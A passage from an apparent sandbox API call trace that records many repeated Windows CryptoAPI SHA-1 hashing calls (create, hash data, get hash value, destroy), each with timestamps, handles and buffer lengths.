(hHash=0x58e900, pbData=0x28a960, dwDataLen=0x8c, dwFlags=0x0) returned 1 [0086.042] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.042] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.042] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.042] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x76, dwFlags=0x0) returned 1 [0086.042] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.042] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.042] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.043] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x78, dwFlags=0x0) returned 1 [0086.043] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.043] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.043] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.043] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x88, dwFlags=0x0) returned 1 [0086.043] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.043] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.043] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.043] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x8a, dwFlags=0x0) returned 1 [0086.043] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.043] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.043] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.043] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x92, dwFlags=0x0) returned 1 [0086.043] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.043] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.043] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.043] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x94, dwFlags=0x0) returned 1 [0086.043] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.043] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.043] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.043] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x7e, dwFlags=0x0) returned 1 [0086.043] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.043] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.043] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.043] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x80, dwFlags=0x0) returned 1 [0086.043] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.043] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.043] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.043] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xd2, dwFlags=0x0) returned 1 [0086.043] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.043] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.043] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.044] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xd4, dwFlags=0x0) returned 1 [0086.044] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.044] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.044] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.044] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x84, dwFlags=0x0) returned 1 [0086.044] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.044] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.044] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.044] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x86, dwFlags=0x0) returned 1 [0086.044] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.044] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.044] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.044] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x6e, dwFlags=0x0) returned 1 [0086.044] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.044] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.044] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.044] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x70, dwFlags=0x0) returned 1 [0086.044] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.044] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.044] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.044] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x90, dwFlags=0x0) returned 1 [0086.044] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.044] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.044] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.044] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x92, dwFlags=0x0) returned 1 [0086.044] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.044] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.044] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.044] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x8a, dwFlags=0x0) returned 1 [0086.044] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.044] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.045] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.045] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x8c, dwFlags=0x0) returned 1 [0086.045] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.045] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.045] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.045] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x8e, dwFlags=0x0) returned 1 [0086.045] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.045] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.045] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.045] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x90, dwFlags=0x0) returned 1 [0086.045] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.045] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.045] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.045] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x88, dwFlags=0x0) returned 1 [0086.045] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.045] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.045] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.045] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x8a, dwFlags=0x0) returned 1 [0086.045] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.045] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.045] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.045] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x84, dwFlags=0x0) returned 1 [0086.045] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.045] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.045] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.045] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x86, dwFlags=0x0) returned 1 [0086.045] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.046] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.046] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.046] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x80, dwFlags=0x0) returned 1 [0086.046] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.046] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.046] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.046] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x82, dwFlags=0x0) returned 1 [0086.046] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.046] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.046] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.046] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x7a, dwFlags=0x0) returned 1 [0086.046] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.046] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.046] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.046] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x7c, dwFlags=0x0) returned 1 [0086.046] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.046] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.046] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.046] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x80, dwFlags=0x0) returned 1 [0086.046] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.046] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.046] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.046] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x82, dwFlags=0x0) returned 1 [0086.046] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.046] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.046] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.046] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x78, dwFlags=0x0) returned 1 [0086.046] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.046] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.046] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.046] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x7a, dwFlags=0x0) returned 1 [0086.046] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.047] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.047] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.047] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x76, dwFlags=0x0) returned 1 [0086.047] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.047] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.047] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.047] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x78, dwFlags=0x0) returned 1 [0086.047] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.047] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.047] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.047] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xf0, dwFlags=0x0) returned 1 [0086.047] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.047] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.047] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.047] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xf2, dwFlags=0x0) returned 1 [0086.047] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.047] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.047] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.047] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x7e, dwFlags=0x0) returned 1 [0086.047] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.047] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.047] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.047] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x80, dwFlags=0x0) returned 1 [0086.047] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.047] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.047] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.047] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x8e, dwFlags=0x0) returned 1 [0086.047] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.047] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.047] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.047] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x90, dwFlags=0x0) returned 1 [0086.047] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.048] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.048] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.048] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x9c, dwFlags=0x0) returned 1 [0086.048] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.048] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.048] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.048] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x9e, dwFlags=0x0) returned 1 [0086.048] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.048] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.048] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.048] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x84, dwFlags=0x0) returned 1 [0086.048] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.048] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.048] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.048] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x86, dwFlags=0x0) returned 1 [0086.048] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.048] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.048] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.048] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x98, dwFlags=0x0) returned 1 [0086.048] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.048] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.048] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.048] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x9a, dwFlags=0x0) returned 1 [0086.048] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.048] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.048] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.048] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x9a, dwFlags=0x0) returned 1 [0086.048] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.048] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.048] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.048] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x9c, dwFlags=0x0) returned 1 [0086.048] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.048] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.049] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.049] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xb4, dwFlags=0x0) returned 1 [0086.049] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.049] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.049] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.049] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xb6, dwFlags=0x0) returned 1 [0086.049] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.049] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.049] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.049] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x7e, dwFlags=0x0) returned 1 [0086.049] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.049] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.049] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.049] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x80, dwFlags=0x0) returned 1 [0086.049] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.049] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.049] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.049] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xfa, dwFlags=0x0) returned 1 [0086.049] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.049] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.049] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, 